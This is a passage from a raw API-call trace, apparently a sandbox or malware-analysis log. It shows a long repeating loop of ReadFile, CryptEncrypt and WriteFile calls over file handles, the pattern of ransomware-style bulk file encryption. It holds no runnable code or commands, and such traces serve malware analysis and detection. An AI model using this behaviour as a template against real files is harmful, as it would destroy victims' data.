[0262.003] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.003] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.003] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.003] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.003] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.003] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.003] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.003] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.003] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.003] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.003] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.003] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.004] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.004] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.004] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.004] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.004] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.004] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.004] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.004] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.004] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.004] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.004] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.004] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.004] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.004] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.005] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.005] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.005] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.005] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.005] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.005] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.005] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.005] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.005] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.005] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.005] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.005] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.005] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.006] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.006] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.006] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.006] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.006] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.006] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.006] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.006] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.006] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.006] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.006] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.006] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.006] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.006] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.006] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.007] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.007] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.007] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.007] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.007] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.007] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.007] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.007] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.007] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.007] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.007] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.007] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.007] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.007] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.007] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.008] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.008] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.008] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.008] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.008] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.008] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.008] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.008] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.008] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.008] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.008] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.008] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.009] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.009] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.009] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.009] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.009] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.009] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.009] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.009] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.009] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.009] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.009] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.009] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.009] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.009] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.009] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.010] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.010] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.010] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.010] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.010] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.010] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.010] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.010] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 